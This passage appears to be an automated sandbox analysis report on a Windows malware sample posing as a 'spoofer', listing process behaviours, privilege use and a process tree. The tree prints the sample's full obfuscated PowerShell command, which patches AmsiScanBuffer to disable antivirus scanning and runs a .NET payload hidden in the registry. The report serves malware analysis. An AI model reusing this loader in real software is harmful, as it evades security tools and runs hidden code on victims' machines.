8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a ProcessHacker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1408 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4044 Bl4ckt0r Spoofer.exe 4044 Bl4ckt0r Spoofer.exe 3692 x69M5tLLoveYOU (1) (1).exe 3692 x69M5tLLoveYOU (1) (1).exe 3964 powershell.exe 3964 powershell.exe 1704 powershell.EXE 1704 powershell.EXE 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 1704 powershell.EXE 1704 powershell.EXE 2608 dllhost.exe 2608 dllhost.exe 4104 taskmgr.exe 4104 taskmgr.exe 2608 dllhost.exe 2608 dllhost.exe 4104 taskmgr.exe 4104 taskmgr.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 4104 taskmgr.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 4104 taskmgr.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe 2608 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3444 Explorer.EXE 8116 ProcessHacker.exe 4104 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs
pid Process 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 1940 x69s.exe Token: SeDebugPrivilege 1704 powershell.EXE Token: SeDebugPrivilege 4104 taskmgr.exe Token: SeSystemProfilePrivilege 4104 taskmgr.exe Token: SeCreateGlobalPrivilege 4104 taskmgr.exe Token: SeDebugPrivilege 1704 powershell.EXE Token: SeDebugPrivilege 2608 dllhost.exe Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeAuditPrivilege 2644 svchost.exe Token: SeShutdownPrivilege 4972 svchost.exe Token: SeCreatePagefilePrivilege 4972 svchost.exe Token: SeShutdownPrivilege 3508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 3508 mousocoreworker.exe Token: SeShutdownPrivilege 3508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 3508 mousocoreworker.exe Token: SeShutdownPrivilege 3508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 3508 mousocoreworker.exe Token: SeShutdownPrivilege 3980 RuntimeBroker.exe Token: SeShutdownPrivilege 3508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 3508 mousocoreworker.exe Token: SeShutdownPrivilege 3980 RuntimeBroker.exe Token: SeShutdownPrivilege 3508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 3508 mousocoreworker.exe Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 1664 svchost.exe Token: SeIncreaseQuotaPrivilege 1664 svchost.exe Token: SeSecurityPrivilege 1664 svchost.exe Token: SeTakeOwnershipPrivilege 1664 svchost.exe Token: SeLoadDriverPrivilege 1664 svchost.exe Token: SeSystemtimePrivilege 1664 svchost.exe Token: SeBackupPrivilege 1664 svchost.exe Token: SeRestorePrivilege 1664 svchost.exe Token: SeShutdownPrivilege 1664 svchost.exe Token: SeSystemEnvironmentPrivilege 1664 svchost.exe Token: SeUndockPrivilege 1664 svchost.exe Token: SeManageVolumePrivilege 1664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1664 svchost.exe Token: SeIncreaseQuotaPrivilege 1664 svchost.exe Token: SeSecurityPrivilege 1664 svchost.exe Token: SeTakeOwnershipPrivilege 1664 svchost.exe Token: SeLoadDriverPrivilege 1664 svchost.exe Token: SeSystemtimePrivilege 1664 svchost.exe Token: SeBackupPrivilege 1664 svchost.exe Token: SeRestorePrivilege 1664 svchost.exe Token: SeShutdownPrivilege 1664 svchost.exe Token: SeSystemEnvironmentPrivilege 1664 svchost.exe Token: SeUndockPrivilege 1664 svchost.exe Token: SeManageVolumePrivilege 1664 svchost.exe Token: SeAuditPrivilege 2644 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1664 svchost.exe Token: SeIncreaseQuotaPrivilege 1664 svchost.exe Token: SeSecurityPrivilege 1664 svchost.exe Token: SeTakeOwnershipPrivilege 1664 svchost.exe Token: SeLoadDriverPrivilege 1664 svchost.exe Token: SeSystemtimePrivilege 1664 svchost.exe Token: SeBackupPrivilege 1664 svchost.exe Token: SeRestorePrivilege 1664 svchost.exe Token: SeShutdownPrivilege 1664 svchost.exe Token: SeSystemEnvironmentPrivilege 1664 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 3272 chrome.exe 3272 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 4104 taskmgr.exe 3272 chrome.exe 3272 chrome.exe 3272 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3444 Explorer.EXE -
Suspicious use of UnmapMainImage 3 IoCs
pid Process 4120 RuntimeBroker.exe 3444 Explorer.EXE 4120 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4044 wrote to memory of 3964 4044 Bl4ckt0r Spoofer.exe 91 PID 4044 wrote to memory of 3964 4044 Bl4ckt0r Spoofer.exe 91 PID 4044 wrote to memory of 3964 4044 Bl4ckt0r Spoofer.exe 91 PID 4044 wrote to memory of 3912 4044 Bl4ckt0r Spoofer.exe 93 PID 4044 wrote to memory of 3912 4044 Bl4ckt0r Spoofer.exe 93 PID 4044 wrote to memory of 3912 4044 Bl4ckt0r Spoofer.exe 93 PID 4044 wrote to memory of 3692 4044 Bl4ckt0r Spoofer.exe 95 PID 4044 wrote to memory of 3692 4044 Bl4ckt0r Spoofer.exe 95 PID 4044 wrote to memory of 3692 4044 Bl4ckt0r Spoofer.exe 95 PID 3692 wrote to memory of 1100 3692 x69M5tLLoveYOU (1) (1).exe 96 PID 3692 wrote to memory of 1100 3692 x69M5tLLoveYOU (1) (1).exe 96 PID 3692 wrote to memory of 1100 3692 x69M5tLLoveYOU (1) (1).exe 96 PID 3692 wrote to memory of 1940 3692 x69M5tLLoveYOU (1) (1).exe 97 PID 3692 wrote to memory of 1940 3692 x69M5tLLoveYOU (1) (1).exe 97 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 1704 wrote to memory of 2608 1704 powershell.EXE 106 PID 2608 wrote to memory of 612 2608 dllhost.exe 5 PID 2608 wrote to memory of 684 2608 dllhost.exe 7 PID 2608 wrote to memory of 956 2608 dllhost.exe 12 PID 2608 wrote to memory of 60 2608 dllhost.exe 13 PID 2608 wrote to memory of 404 2608 dllhost.exe 14 PID 2608 wrote to memory of 740 2608 dllhost.exe 15 PID 2608 wrote to memory of 1072 2608 dllhost.exe 16 PID 2608 wrote to memory of 1124 2608 dllhost.exe 18 PID 2608 wrote to memory of 1140 2608 dllhost.exe 19 PID 2608 wrote to memory of 1148 2608 dllhost.exe 20 PID 2608 wrote to memory of 1256 2608 dllhost.exe 21 PID 2608 wrote to memory of 1288 2608 dllhost.exe 22 PID 2608 wrote to memory of 1388 2608 dllhost.exe 23 PID 2608 wrote to memory of 1416 2608 dllhost.exe 24 PID 2608 wrote to memory of 1424 2608 dllhost.exe 25 PID 2608 wrote to memory of 1592 2608 dllhost.exe 26 PID 2608 wrote to memory of 1600 2608 dllhost.exe 27 PID 2608 wrote to memory of 1620 2608 dllhost.exe 28 PID 2608 wrote to memory of 1724 2608 dllhost.exe 29 PID 2608 wrote to memory of 1772 2608 dllhost.exe 30 PID 2608 wrote to memory of 1780 2608 dllhost.exe 31 PID 2608 wrote to memory of 1876 2608 dllhost.exe 32 PID 2608 wrote to memory of 1976 2608 dllhost.exe 33 PID 2608 wrote to memory of 1996 2608 dllhost.exe 34 PID 2608 wrote to memory of 1348 2608 dllhost.exe 35 PID 2608 wrote to memory of 1012 2608 dllhost.exe 36 PID 2608 wrote to memory of 1664 2608 dllhost.exe 37 PID 2608 wrote to memory of 2120 2608 dllhost.exe 38 PID 2608 wrote to memory of 2196 2608 dllhost.exe 40 PID 2608 wrote to memory of 2300 2608 dllhost.exe 41 PID 2608 wrote to memory of 2308 2608 dllhost.exe 42 PID 2608 wrote to memory of 2488 2608 dllhost.exe 43 PID 2608 wrote to memory of 2520 2608 dllhost.exe 44 PID 2608 wrote to memory of 2532 2608 dllhost.exe 45 PID 2608 wrote to memory of 2556 2608 dllhost.exe 46 PID 2608 wrote to memory of 2564 2608 dllhost.exe 47 PID 2608 wrote to memory of 2644 2608 dllhost.exe 48 PID 2608 wrote to memory of 2900 2608 dllhost.exe 49 PID 2608 wrote to memory of 3116 2608 dllhost.exe 51 PID 2608 wrote to memory of 3136 2608 dllhost.exe 52 PID 2608 wrote to memory of 3192 2608 dllhost.exe 53 PID 2608 wrote to memory of 3240 2608 dllhost.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b621a709-8a6a-4f1c-8291-d815135a4d21}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1124 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MNhyHJXZCQqj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zdGyCzkykOEgFx,[Parameter(Position=1)][Type]$kxnCVclGyC)$RoUOpaqPROD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+'e',$False).DefineType('MyD'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+'a'+'s'+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+'ea'+[Char](108)+''+'e'+''+[Char](100)+''+','+''+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'ss'+','+''+[Char](65)+'u'+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$RoUOpaqPROD.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'ec'+[Char](105)+''+[Char](97)+''+'l'+''+'N'+'a'+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$zdGyCzkykOEgFx).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+'e'+''+[Char](44)+'M'+[Char](97)+'na'+[Char](103)+''+'e'+''+'d'+'');$RoUOpaqPROD.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+'By'+'S'+''+[Char](105)+'g'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+'lo'+[Char](116)+',Vi'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$kxnCVclGyC,$zdGyCzkykOEgFx).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+'n'+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $RoUOpaqPROD.CreateType();}$siOQXJoUeonmW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+'o'+'so'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+'U'+'ns'+[Char](97)+''+[Char](102)+''+[Char](101)+'Nat'+[Char](105)+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+'s'+'');$vOSlOLSPUYestc=$siOQXJoUeonmW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'ubl'+'i'+''+[Char](99)+''+','+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yioomfzdtHzMdvduqsb=MNhyHJXZCQqj @([String])([IntPtr]);$nqDdgGLXzxJBjUtHZOsWzW=MNhyHJXZCQqj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AbgwoJVLMYP=$siOQXJoUeonmW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+'o'+'d'+'u'+''+'l'+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'dll')));$erazJCjPPsMiYc=$vOSlOLSPUYestc.Invoke($Null,@([Object]$AbgwoJVLMYP,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$smRwgmXYjsqhBUNgU=$vOSlOLSPUYestc.Invoke($Null,@([Object]$AbgwoJVLMYP,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$JTXqfcq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($erazJCjPPsMiYc,$yioomfzdtHzMdvduqsb).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+'d'+''+'l'+''+[Char](108)+'');$dnAgomWkWPXBdFElR=$vOSlOLSPUYestc.Invoke($Null,@([Object]$JTXqfcq,[Object]('A'+'m'+'s'+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$XDkUKjIqQJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($smRwgmXYjsqhBUNgU,$nqDdgGLXzxJBjUtHZOsWzW).Invoke($dnAgomWkWPXBdFElR,[uint32]8,4,[ref]$XDkUKjIqQJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dnAgomWkWPXBdFElR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($smRwgmXYjsqhBUNgU,$nqDdgGLXzxJBjUtHZOsWzW).Invoke($dnAgomWkWPXBdFElR,[uint32]8,0x20,[ref]$XDkUKjIqQJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3684
-
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:2264
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:6760
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:1164
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:6136
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:6712
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:4744
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:6124
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:5352
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:6284
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:6644
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:7860
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:5648
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:8180
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:7220
-
-
C:\Users\Admin\AppData\Roaming\x69XClient.exeC:\Users\Admin\AppData\Roaming\x69XClient.exe2⤵
- Executes dropped EXE
PID:4936
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1424
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:3116
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2488
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2520
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3240
-
